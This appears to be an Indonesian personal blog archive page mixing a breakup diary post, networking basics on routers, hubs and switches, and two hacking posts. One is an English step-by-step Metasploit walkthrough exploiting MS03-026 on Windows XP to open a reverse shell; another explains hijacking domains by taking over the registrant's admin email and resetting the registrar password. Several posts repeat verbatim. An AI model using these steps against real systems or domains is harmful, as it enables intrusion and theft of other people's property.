Senin, 18 April 2016
Sedikit curhatan saya yang di tinggal pacar.
Assalamualaikum .,. berjumpa lagi dengan saya Thama apa kabarnya nih ?
Iseng-iseng pengen curhat soal pacar saya (yang sekarang jadi mantan) :)
Yaa sebenar nya saya kurang pintar juga dalam mengutarakan isi hati saya, tapi dengan sepenggal paragraf ini, saya harap kalian bisa mengerti apa yang saya maksud :'D
// In every your daydream, i can see the deepest regret in your eyes, tear down all the trust, and suspicion make nervous to come.
something i cant really imagine.
deepest holes.
hard to believe something with lies. //
---- Thama Aritama ----
Sedih juga sih kalau di ingat", terlebih karena saya masih sayang juga.
Yaa mungkin intinya dari awal dia memang tidak serius dengan saya, hanya bermain-main saja :')
Terimakasih Karena Sudah Bersedia Membaca Curhatan saya, walaupun memang tidak begitu jelas karena saya sendiri tidak pandai dalam merangkai kata.
Wasalamualaikum Wr.Wb
Selasa, 05 November 2013
Exploit and Gain Remote Access to Windows XP (Metasploit)
Terminology
The following terminology is not only used within the Metasploit Framework, but throughout the professional hacking and penetration testing communities. As a result, any professional in this field should be familiar with these terms and be able to clearly distinguish them.- Exploit
- Payload
- Shellcode
- Module
- Listener
- Show
Now that we have the basics of Metasploit concepts and commands down, let’s hack a system!
Step 1: Getting Started
First, open a terminal in Linux.One of the most reliable hacks is on the ubiquitous Windows XP system with the RPC DCOM. It’s a buffer overflow attack that enables the attacker to execute any code of their choice on the owned box (note Microsoft’s comment under impact of vulnerability). Microsoft identifies it as MS03-026 in their database of vulnerabilities. In our case, we will use it to open a reverse shell on our target system.
Open the the Metasploit console.
msfconsoleBe patient, it takes awhile for Metasploit to load all of its modules. The current version of Metasploit has 823 exploits and 250 payloads.
Step 2: Find the Exploit
Metasploit allows you to search using the search command. In our case, we are searching for a DCOM exploit, so we can simply type:msf > search dcom
Step 3: Set the Exploit
Now let’s tell Metasploit what exploit we want to use. Type use and the name of our exploit, exploit/windows/dcerpc/ms03_026_dcom.msf > use exploit/windows/dcerpc/ms03_026_dcom
Note that the prompt has changed and now reflects our chosen exploit.
Step 4: Set the Options
Now that we’ve chosen our exploit, we can ask Metasploit what our options are. By typing show options, Metasploit will list our options in executing this exploit.msf > show options
Step 5: Set Remote Host
Metasploit will now ask us for the RHOST. This will be the IP address of the remote host or the machine we’re attacking. In our case, it’s 10.0.0.3. Use the actual IP address of the machine you are attacking. Tools such as nmap can help in identifying the IP address of the machine you are attacking. Notice in the picture above that Metasploit tells us that we will be using (binding) port 135.msf > set RHOST 10.0.0.3Step 6: Show Payloads
Next, we check to see what payloads are available for this exploit. Type show payloads at the Metasploit prompt:
msf > show payloads
Step 7: Set Payload
Now that we can see what payloads are available, we can select the generic/shell_reverse_tcp by using the Metasploit console set command. If successful, this will establish a remote shell on the target system that we can command.msf > set PAYLOAD generic/shell_reverse_tcp
Step 8: Set Local Host
Now that we’ve chosen the exploit and the payload, we need to tell Metasploit the IP address of our attacking machine. In this example, our target system has an IP address of 10.0.0.6. Use the actual IP address of the system you are attacking. Tools such a nmap, can help you obtain IP addresses.msf > set LHOST 10.0.0.6
Step 9: Exploit
Now we command Metasploit to exploit the system:msf > exploit
Step 10: Open a Shell on the Hacked System
Type the command sessions –i 1 to open a command shell on the XP system that will appear on your Metasploit console.sessions –i 1To confirm that the command shell is on the Windows XP system, type dir to get a directory listing on the Windows XP system that you now own!
C: >dirCongratulations! You have just hacked your first system using Metasploit!
By:
Unknown
On 02.25
Jumat, 18 Oktober 2013
Penanganan DNS Hijecking
Hallo Betermu lagi dengan saya hehehe... jadi gini mas aq mau jelasin tata cara sholat lima waktu ehh penanganan DNS Hijecking brakakaka... semoga saja aku bisa ya mas :D doain aku mas...
teknik newbie saya ini mungkin bisa membantu buat admin heheheh langsung aja ya mastah
teknik newbie saya ini mungkin bisa membantu buat admin heheheh langsung aja ya mastah
- lah apa lagi ya bingung aku emmb.. oh iya set dns nya misal kalau mastah2 di sini nggk punya banyak uang jadi kan terpaksa hosting di hostingan gratis kek idhostinger atau lain sebagainya aku sarankan buat para mastah jangan SET NAME SERVER ! kek ns1.idhostinger.com jangan itu mas hati2 loh :v suer deh cukup saja dengan Host A Record Di Domain Contoh misal ya www.dancok.com harus inget mas itu www :v kalau emang mau bener2 mau sangat ya pasang aja di *.dancok.com nya le ip shared nya nya contoh ya http://i.imgur.com/DfyDkt5.png nah contoh shared ip nya :v hehehe...
- mencari hostingan yang benar2 aman dan tentram gan :D kalau bisa beli vps endiri :v
- jika pusing dengan tutorial ini silahkan hub dokter hewan atau kimcil :v
By:
Unknown
On 16.49
Pelajari Tentang DNS Hijacking/Pembajakan Dns
Pembajakan domain merupakan proses di mana Nama Domain Internet dicuri dari pemiliknya yang sah. Pembajakan domain ini
juga dikenal sebagai pencurian/pengambil alihan nama domain oleh pihak yang tidak sah. Sebelum kita dapat melanjutkan untuk mengetahui bagaimana untuk membajak nama domain, perlu memahami bagaimana sebuah nama domain bekerja dan bagaimana mereka berhubungan dengan server web.
Cara Kerja Nama Domain:
situs gohacking.com mengatakan misalnya terdiri dari dua bagian. Nama domain (gohacking.com) dan hosting web server
tempat file server website yang dihosting . Pada kenyataannya, nama domain dan web hosting server (web server) adalah dua bagian yang berbeda dan karenanya mereka harus diintegrasikan sebelum web dapat beroperasi dengan sukses.Integrasi nama domain dengan web server hosting dilakukan sebagai berikut.
1.Setelah mendaftarkan nama domain baru, kita mendapatkan panel kontrol/cpanel. di mana kita dapat memiliki kontrol penuh dari domain.
2.Dari panel kontrol domain ini, ditunjukkan nama domain kita ke web server tempat file-file website disimpan.
Apa yang terjadi ketika sebuah domain yang dibajak?
Untuk membajak sebuah nama domain hanya diperlukan akses ke panel kontrol domain/C-panel dan arahkan nama domain kebeberapa server web lainnya selain yang asli.Jadi untuk membajak sebuah domain Anda tidak perlu mendapatkan akses ke webserver target.
mungkin sebagai contoh saya/anda berhasil mendapatkan hak akses panel kontrol nama domain sebuah perusahaan, maka dengan mudah saya dapat menkonfigurasi modul, dan hal2 lainya dalam website tersebut.
Bagaimana nama domain yang dibajak?
sebenarnya banyak metode & skenario untuk melakukan hal ini, tetapi secara umum saya gambarkan hal-hal yang dibutuhkan adalah sebagai berikut:
1. Target atau nama domain yang anda ingin ennumerasi/eksploitasi
2. Alamat Email yang berhubungan dengan nama domain, yang digunakan untuk registrasi domain
mengenai hal ini anda dapat memanfaatkan web yang memberikan informasih ini seperti domain
http://wwww.domainwhitepages.com atau http://whois.domaintools.com/ dan masih banyak yang lainya”googling mugkin anda bisa menemukan lebih banyak”pada bagian feelbox anda hanya sisa memasukkan nama domain target, lalu klick bottun untuk mengeksekusi…setelah proses scanner dilakukan maka whois record akan menampilkan data2 mengenai halaman target termasuk kontak email administrasi web tersebut
Untuk mendapatkan nama pendaftar domain, cari sesuatu seperti ini di bawah Whois Record. “Registration Service Provided
By: XYZ Company”. “Pendaftaran Layanan yang Disediakan Oleh: XYZ Company”. Here XYZ Company is the domain registrar.
Perusahaan XYZ di sini adalah pendaftar domain. Dalam kasus jika Anda tidak menemukan, kemudian pilih scroll ke atas akan ditunjjukan ICANN Registrar di bawah “Registry Data”. Dalam skenario ini,ICANN registrar adalah pendaftar domain.
Administrasi alamat email yang terkait dengan domain adalah backdoor untuk membajak nama domain. Ini adalah kunci untuk membuka panel kontrol domain.Jadi untuk mengambil kendali penuh dari domain, penyerang akan mekakukan hacking email administrasi yang digunakan Setelah penyerang mengambil kontrol penuh atas account email ini, sipenyerang akan mengunjungi website pendaftar domain dan mengklik lupa password di halaman login.
Di sana ia akan diminta untuk memasukkan salah satu nama domain atau alamat email administratif untuk memulai proses reset password .Setelah selesai semua data untuk me-reset Password akan dikirimkan ke alamat email administrasi.
Karena sipenyerang memiliki hak akses ke account email ini ia dapat dengan mudah me-reset password domain control panel.setelah pengaturan ulang password atau kata sandi, lalu login ke panel kontrol dengan password baru dan dari sana ia dapat membajak domain dalam beberapa menit.
juga dikenal sebagai pencurian/pengambil alihan nama domain oleh pihak yang tidak sah. Sebelum kita dapat melanjutkan untuk mengetahui bagaimana untuk membajak nama domain, perlu memahami bagaimana sebuah nama domain bekerja dan bagaimana mereka berhubungan dengan server web.
Cara Kerja Nama Domain:
situs gohacking.com mengatakan misalnya terdiri dari dua bagian. Nama domain (gohacking.com) dan hosting web server
tempat file server website yang dihosting . Pada kenyataannya, nama domain dan web hosting server (web server) adalah dua bagian yang berbeda dan karenanya mereka harus diintegrasikan sebelum web dapat beroperasi dengan sukses.Integrasi nama domain dengan web server hosting dilakukan sebagai berikut.
1.Setelah mendaftarkan nama domain baru, kita mendapatkan panel kontrol/cpanel. di mana kita dapat memiliki kontrol penuh dari domain.
2.Dari panel kontrol domain ini, ditunjukkan nama domain kita ke web server tempat file-file website disimpan.
Apa yang terjadi ketika sebuah domain yang dibajak?
Untuk membajak sebuah nama domain hanya diperlukan akses ke panel kontrol domain/C-panel dan arahkan nama domain kebeberapa server web lainnya selain yang asli.Jadi untuk membajak sebuah domain Anda tidak perlu mendapatkan akses ke webserver target.
mungkin sebagai contoh saya/anda berhasil mendapatkan hak akses panel kontrol nama domain sebuah perusahaan, maka dengan mudah saya dapat menkonfigurasi modul, dan hal2 lainya dalam website tersebut.
Bagaimana nama domain yang dibajak?
sebenarnya banyak metode & skenario untuk melakukan hal ini, tetapi secara umum saya gambarkan hal-hal yang dibutuhkan adalah sebagai berikut:
1. Target atau nama domain yang anda ingin ennumerasi/eksploitasi
2. Alamat Email yang berhubungan dengan nama domain, yang digunakan untuk registrasi domain
mengenai hal ini anda dapat memanfaatkan web yang memberikan informasih ini seperti domain
http://wwww.domainwhitepages.com atau http://whois.domaintools.com/ dan masih banyak yang lainya”googling mugkin anda bisa menemukan lebih banyak”pada bagian feelbox anda hanya sisa memasukkan nama domain target, lalu klick bottun untuk mengeksekusi…setelah proses scanner dilakukan maka whois record akan menampilkan data2 mengenai halaman target termasuk kontak email administrasi web tersebut
Untuk mendapatkan nama pendaftar domain, cari sesuatu seperti ini di bawah Whois Record. “Registration Service Provided
By: XYZ Company”. “Pendaftaran Layanan yang Disediakan Oleh: XYZ Company”. Here XYZ Company is the domain registrar.
Perusahaan XYZ di sini adalah pendaftar domain. Dalam kasus jika Anda tidak menemukan, kemudian pilih scroll ke atas akan ditunjjukan ICANN Registrar di bawah “Registry Data”. Dalam skenario ini,ICANN registrar adalah pendaftar domain.
Administrasi alamat email yang terkait dengan domain adalah backdoor untuk membajak nama domain. Ini adalah kunci untuk membuka panel kontrol domain.Jadi untuk mengambil kendali penuh dari domain, penyerang akan mekakukan hacking email administrasi yang digunakan Setelah penyerang mengambil kontrol penuh atas account email ini, sipenyerang akan mengunjungi website pendaftar domain dan mengklik lupa password di halaman login.
Di sana ia akan diminta untuk memasukkan salah satu nama domain atau alamat email administratif untuk memulai proses reset password .Setelah selesai semua data untuk me-reset Password akan dikirimkan ke alamat email administrasi.
Karena sipenyerang memiliki hak akses ke account email ini ia dapat dengan mudah me-reset password domain control panel.setelah pengaturan ulang password atau kata sandi, lalu login ke panel kontrol dengan password baru dan dari sana ia dapat membajak domain dalam beberapa menit.
gambar
diatas adalah sampel contoh sebuah halaman konfigurasi web/ panel
kontrol/C-panel, untuk mengendalikan penuh sebuah halaman website, atau
DNS
By:
Unknown
On 16.33
Kamis, 17 Oktober 2013
Belajar Jaringan Part 8
Pelajar basic kita sudah hampir selesei,
Dari Belajar Jaringan PART VII (basic) yang membahas tentang router sekarang kita akan mengetahui tentang hub dan switch
Sebenarnya fungsinya hampir mirip yaitu menjadi perantara pada suatu jaringan.
Hub
Suatu perangkat yang memiliki banyak port yang akan menghubungkan beberapa node (komputer) sehingga membentuk suatu jaringan pada topologi star.
Seperti gambar diatas itu hub, saya tidak promosi merk hanya males edit aja
Cara Kerja : Ketika sebuah paket tiba disalah satu port.
Paket itu akan disalin ke port-port yang lain di hub.
Atau dengan kata lain hub hanya menyalin data ke semua simpul yang terhubung ke hub.
Hal ini menyebabkan untuk kerja jaringan akan lambat.
Hub dengan spesifikasi 10/100Mbps harus berbagi bandwidth dengan masing-masing port.
Jadi ketika hanya satu PC yang menggunakan, akan mendapat akses bandwith yang maksimum yang tersedia.
Namun jika beberapa PC beroperasi atau digunakan pada jaringan tersebut, maka bandwidth akan dibagi kepada semua PC, sehingga akan menurukan kinerja jaringan
Switch
Gambar diatas adalah Switch, sekilas mirip tapi switch memiliki beberapa keunggulan dibanding hub.
Cara kerja :
Ada dua arsitektur dasar yang digunakan yaitu : cut-through dan store and forward
Switch cut trough memiliki kelebihan disisi kecepatan karena ketika sebuah paket datang, switch hanya memperhatikan alamat tujuan sebelum diteruskan ke segmen tujuannya.
Sedangkan switch store and forward merupakan kebalikan dari switch cut-trough.
Swtich ini menerima dan menganalisa seluruh isi paket sebelum meneruskannya ketujuan dan untuk memeriksa satu paket memerlukan waktu, tetapi ini memungkinkan switch untuk mengetahui adanya kerusakan pada paket dan mencegahnya agar tidak mengganggu jaringan.
Switch dengan spesifikasi 10/100Mbps akan mengalokasikan 10/100Mbps penuh untuk setiap portnya .
Jadi berapapun jumlah komputer yang terhubung, pengguna akan selalu memiliki bandwidth penuh.
Ok sekian dulu post kali ini kita akan kembali lagi di post Belajar Jaringan Selanjtnya :v
Dari Belajar Jaringan PART VII (basic) yang membahas tentang router sekarang kita akan mengetahui tentang hub dan switch
Sebenarnya fungsinya hampir mirip yaitu menjadi perantara pada suatu jaringan.
Hub
Suatu perangkat yang memiliki banyak port yang akan menghubungkan beberapa node (komputer) sehingga membentuk suatu jaringan pada topologi star.
Seperti gambar diatas itu hub, saya tidak promosi merk hanya males edit aja
Cara Kerja : Ketika sebuah paket tiba disalah satu port.
Paket itu akan disalin ke port-port yang lain di hub.
Atau dengan kata lain hub hanya menyalin data ke semua simpul yang terhubung ke hub.
Hal ini menyebabkan untuk kerja jaringan akan lambat.
Hub dengan spesifikasi 10/100Mbps harus berbagi bandwidth dengan masing-masing port.
Jadi ketika hanya satu PC yang menggunakan, akan mendapat akses bandwith yang maksimum yang tersedia.
Namun jika beberapa PC beroperasi atau digunakan pada jaringan tersebut, maka bandwidth akan dibagi kepada semua PC, sehingga akan menurukan kinerja jaringan
Switch
Gambar diatas adalah Switch, sekilas mirip tapi switch memiliki beberapa keunggulan dibanding hub.
Cara kerja :
Ada dua arsitektur dasar yang digunakan yaitu : cut-through dan store and forward
Switch cut trough memiliki kelebihan disisi kecepatan karena ketika sebuah paket datang, switch hanya memperhatikan alamat tujuan sebelum diteruskan ke segmen tujuannya.
Sedangkan switch store and forward merupakan kebalikan dari switch cut-trough.
Swtich ini menerima dan menganalisa seluruh isi paket sebelum meneruskannya ketujuan dan untuk memeriksa satu paket memerlukan waktu, tetapi ini memungkinkan switch untuk mengetahui adanya kerusakan pada paket dan mencegahnya agar tidak mengganggu jaringan.
Switch dengan spesifikasi 10/100Mbps akan mengalokasikan 10/100Mbps penuh untuk setiap portnya .
Jadi berapapun jumlah komputer yang terhubung, pengguna akan selalu memiliki bandwidth penuh.
Ok sekian dulu post kali ini kita akan kembali lagi di post Belajar Jaringan Selanjtnya :v
By:
Unknown
On 05.46
Belajar Jaringan Part 7
Lanjut dari Belajar Jaringan PART VI (basic)
Sekarang kita harus mengetahui tentang Alat yang akan dipergunakan dalam jaringan,
Pertama kita akan memahami tentang Router.
Router adalah komputer khusus yang memiliki tugas utama mengirimkan paket melalui jaringan komputer,
Maksudnya sebagai perantara antara komputer 1 dengan yang lain .
Dalam router ini jalur jaringan ditentukan dan dipilih sehingga paket data terkirim tepat dan akurat
Router mempunyai beberapa komponen yang perlu kita ketahui.
1. CPU (Central Processing Unit) tugasnya menjalankan instruksi system oprasi. seperti menganalisis system, fungsi routing dan fungsi switching.
2. RAM (Random Access Memory) berisi file salinan konfigurasi router, data yang disimpan disini sifatnya tidak permanent akan hilang apabila router direstart
3. ROM (Read-Only Memoory) tugasnya menyimpan diagnosis software yang digunakan ketika router mulai dinyalakan. Menyimpan program bootsrap dari router
4. NVRAM (Non-volatile RAM) Menyimpan semua konfigurasi Router
5. Flash Memory ini adalah IOS router , kalau dikomputer kita biasa melihatnya BIOS
6. Interface ini seperti port ethernet, fast ethernet, console, serial dsb (tergantung router yang kita pakai)
Ok sekian dulu tentang Router , kita berlanjut ke postingan selanjut nya :v
Sekarang kita harus mengetahui tentang Alat yang akan dipergunakan dalam jaringan,
Pertama kita akan memahami tentang Router.
Router adalah komputer khusus yang memiliki tugas utama mengirimkan paket melalui jaringan komputer,
Maksudnya sebagai perantara antara komputer 1 dengan yang lain .
Dalam router ini jalur jaringan ditentukan dan dipilih sehingga paket data terkirim tepat dan akurat
Router mempunyai beberapa komponen yang perlu kita ketahui.
1. CPU (Central Processing Unit) tugasnya menjalankan instruksi system oprasi. seperti menganalisis system, fungsi routing dan fungsi switching.
2. RAM (Random Access Memory) berisi file salinan konfigurasi router, data yang disimpan disini sifatnya tidak permanent akan hilang apabila router direstart
3. ROM (Read-Only Memoory) tugasnya menyimpan diagnosis software yang digunakan ketika router mulai dinyalakan. Menyimpan program bootsrap dari router
4. NVRAM (Non-volatile RAM) Menyimpan semua konfigurasi Router
5. Flash Memory ini adalah IOS router , kalau dikomputer kita biasa melihatnya BIOS
6. Interface ini seperti port ethernet, fast ethernet, console, serial dsb (tergantung router yang kita pakai)
Ok sekian dulu tentang Router , kita berlanjut ke postingan selanjut nya :v
By:
Unknown
On 05.44
Langganan:
Postingan (Atom)